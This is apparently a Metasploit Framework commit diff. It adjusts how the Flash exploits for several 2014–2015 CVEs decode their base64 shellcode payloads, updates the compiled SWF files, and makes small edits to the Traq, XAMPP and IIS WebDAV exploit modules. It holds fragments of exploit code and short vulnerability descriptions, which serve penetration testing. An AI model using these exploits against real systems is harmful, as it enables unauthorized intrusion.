diff --git a/data/exploits/CVE-2014-0556/msf.swf b/data/exploits/CVE-2014-0556/msf.swf index 24cfc1a53a..f6483bd087 100755 Binary files a/data/exploits/CVE-2014-0556/msf.swf and b/data/exploits/CVE-2014-0556/msf.swf differ diff --git a/data/exploits/CVE-2014-0569/msf.swf b/data/exploits/CVE-2014-0569/msf.swf index 90737fca36..a124c560f0 100755 Binary files a/data/exploits/CVE-2014-0569/msf.swf and b/data/exploits/CVE-2014-0569/msf.swf differ diff --git a/data/exploits/CVE-2014-8440/msf.swf b/data/exploits/CVE-2014-8440/msf.swf index 823490c7e7..c6e47d226d 100755 Binary files a/data/exploits/CVE-2014-8440/msf.swf and b/data/exploits/CVE-2014-8440/msf.swf differ diff --git a/data/exploits/CVE-2015-0313/msf.swf b/data/exploits/CVE-2015-0313/msf.swf index 68b0ad0e6b..f4d5e8f32d 100755 Binary files a/data/exploits/CVE-2015-0313/msf.swf and b/data/exploits/CVE-2015-0313/msf.swf differ diff --git a/data/exploits/CVE-2015-0359/msf.swf b/data/exploits/CVE-2015-0359/msf.swf index 4befa69648..e7244c61f2 100755 Binary files a/data/exploits/CVE-2015-0359/msf.swf and b/data/exploits/CVE-2015-0359/msf.swf differ diff --git a/external/source/exploits/CVE-2014-0556/Main.as b/external/source/exploits/CVE-2014-0556/Main.as index 99364ccd47..da6482075c 100755 --- a/external/source/exploits/CVE-2014-0556/Main.as +++ b/external/source/exploits/CVE-2014-0556/Main.as @@ -27,7 +27,10 @@ package public function Main() { var b64:Base64Decoder = new Base64Decoder() - b64.decode(LoaderInfo(this.root.loaderInfo).parameters.sh) + var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh + var pattern:RegExp = / /g; + b64_payload = b64_payload.replace(pattern, "+") + b64.decode(b64_payload) var payload:String = b64.toByteArray().toString() for (i = 0; i < bv.length; i++) { diff --git a/external/source/exploits/CVE-2014-0569/Main.as b/external/source/exploits/CVE-2014-0569/Main.as index 5a7003b256..4ac48e2cec 100755 --- a/external/source/exploits/CVE-2014-0569/Main.as +++ b/external/source/exploits/CVE-2014-0569/Main.as @@ -32,9 +32,11 @@ package var i:uint = 0 var j:uint = 0 - b64.decode(LoaderInfo(this.root.loaderInfo).parameters.sh) - payload = b64.toByteArray().toString(); - + var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh + var pattern:RegExp = / /g; + b64_payload = b64_payload.replace(pattern, "+") + b64.decode(b64_payload) + payload = b64.toByteArray().toString() for (i = 0; i < defrag.length; i++) { defrag[i] = new ByteArray() defrag[i].length = BYTE_ARRAY_SIZE diff --git a/external/source/exploits/CVE-2014-8440/Msf.as b/external/source/exploits/CVE-2014-8440/Msf.as index d62b3c4561..4497389619 100755 --- a/external/source/exploits/CVE-2014-8440/Msf.as +++ b/external/source/exploits/CVE-2014-8440/Msf.as @@ -42,8 +42,11 @@ package this.object_vector_length = 5770 * 2 this.byte_array_vector_length = 510 * 2 - b64.decode(LoaderInfo(this.root.loaderInfo).parameters.sh) - payload = b64.toByteArray().toString(); + var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh + var pattern:RegExp = / /g; + b64_payload = b64_payload.replace(pattern, "+") + b64.decode(b64_payload) + payload = b64.toByteArray().toString() this.initialize_worker_and_ba() if (!this.trigger()) diff --git a/external/source/exploits/CVE-2015-0313/Main.as b/external/source/exploits/CVE-2015-0313/Main.as index 58ed3d2bb5..b25008234d 100755 --- a/external/source/exploits/CVE-2015-0313/Main.as +++ b/external/source/exploits/CVE-2015-0313/Main.as @@ -39,7 +39,10 @@ public class Main extends Sprite private function mainThread():void { - b64.decode(LoaderInfo(this.root.loaderInfo).parameters.sh) + var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh + var pattern:RegExp = / /g; + b64_payload = b64_payload.replace(pattern, "+") + b64.decode(b64_payload) payload = b64.toByteArray().toString() ba.length = 0x1000 @@ -204,4 +207,4 @@ public class Main extends Sprite return addr + i } } -} \ No newline at end of file +} diff --git a/external/source/exploits/CVE-2015-0359/Msf.as b/external/source/exploits/CVE-2015-0359/Msf.as index 1bf0cd1947..3556b41542 100755 --- a/external/source/exploits/CVE-2015-0359/Msf.as +++ b/external/source/exploits/CVE-2015-0359/Msf.as @@ -43,7 +43,10 @@ package private function mainThread():void { - b64.decode(LoaderInfo(this.root.loaderInfo).parameters.sh) + var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh + var pattern:RegExp = / /g; + b64_payload = b64_payload.replace(pattern, "+") + b64.decode(b64_payload) payload = b64.toByteArray().toString() ba.length = 0x1000 ba.shareable = true diff --git a/lib/msf/core/exploit/http/client.rb b/lib/msf/core/exploit/http/client.rb index a8ee210f38..f9a57f7f49 100644 --- a/lib/msf/core/exploit/http/client.rb +++ b/lib/msf/core/exploit/http/client.rb @@ -47,7 +47,7 @@ module Exploit::Remote::HttpClient Rex::Proto::Http::Client::DefaultUserAgent ]), OptString.new('USERNAME', [false, 'The HTTP username to specify for authentication', '']), - OptString.new('PASSWORD', [false, 'The HTTP password to specify for authentication', '']), + OptString.new('PASSWORD', [false, 'The HTTP password to specify for authentication', '']), OptBool.new('DigestAuthIIS', [false, 'Conform to IIS, should work for most servers. Only set to false for non-IIS servers', true]), OptBool.new('SSL', [ false, 'Negotiate SSL for outgoing connections', false]), OptEnum.new('SSLVersion', [ false, 'Specify the version of SSL that should be used', 'Auto', ['Auto', 'SSL2', 'SSL3', 'TLS1']]), diff --git a/modules/exploits/multi/http/traq_plugin_exec.rb b/modules/exploits/multi/http/traq_plugin_exec.rb index 932d09f4b3..7c972720cb 100644 --- a/modules/exploits/multi/http/traq_plugin_exec.rb +++ b/modules/exploits/multi/http/traq_plugin_exec.rb @@ -17,12 +17,11 @@ class Metasploit3 < Msf::Exploit::Remote This module exploits an arbitrary command execution vulnerability in Traq 2.0 to 2.3. It's in the admincp/common.php script. - This function is called in each script located into /admicp/ directory to - make sure the user has admin rights, but this is a broken authorization - schema due to the header() function doesn't stop the execution flow. This - can be exploited by malicious users to execute admin functionality resulting - for e.g. in execution of arbitrary PHP code leveraging of plugins.php - functionality. + This function is called in each script located in the /admicp/ directory to + make sure the user has admin rights. This is a broken authorization schema + because the header() function doesn't stop the execution flow. + This can be exploited by malicious users to execute admin functionality, + e.g. execution of arbitrary PHP code leveraging of plugins.php functionality. }, 'License' => MSF_LICENSE, 'Author' => diff --git a/modules/exploits/windows/http/xampp_webdav_upload_php.rb b/modules/exploits/windows/http/xampp_webdav_upload_php.rb index 5c3e8725b5..744519e2fd 100644 --- a/modules/exploits/windows/http/xampp_webdav_upload_php.rb +++ b/modules/exploits/windows/http/xampp_webdav_upload_php.rb @@ -35,7 +35,7 @@ class Metasploit3 < Msf::Exploit::Remote OptString.new('PATH', [ true, "The path to attempt to upload", '/webdav/']), OptString.new('FILENAME', [ false , "The filename to give the payload. (Leave Blank for Random)"]), OptString.new('USERNAME', [false, 'The HTTP username to specify for authentication', 'wampp']), - OptString.new('PASSWORD', [false, 'The HTTP password to specify for authentication', 'xampp']) + OptString.new('PASSWORD', [false, 'The HTTP password to specify for authentication', 'xampp']) ], self.class) end diff --git a/modules/exploits/windows/iis/iis_webdav_upload_asp.rb b/modules/exploits/windows/iis/iis_webdav_upload_asp.rb index f77ed98532..820a193e55 100644 --- a/modules/exploits/windows/iis/iis_webdav_upload_asp.rb +++ b/modules/exploits/windows/iis/iis_webdav_upload_asp.rb @@ -43,7 +43,7 @@ class Metasploit3 < Msf::Exploit::Remote # The USERNAME and PASSWORD are registered again to make them more obvious they're # configurable. OptString.new('USERNAME', [false, 'The HTTP username to specify for authentication', '']), - OptString.new('PASSWORD', [false, 'The HTTP password to specify for authentication', '']), + OptString.new('PASSWORD', [false, 'The HTTP password to specify for authentication', '']), OptString.new('PATH', [ true, "The path to attempt to upload", '/metasploit%RAND%.asp']) ], self.class) end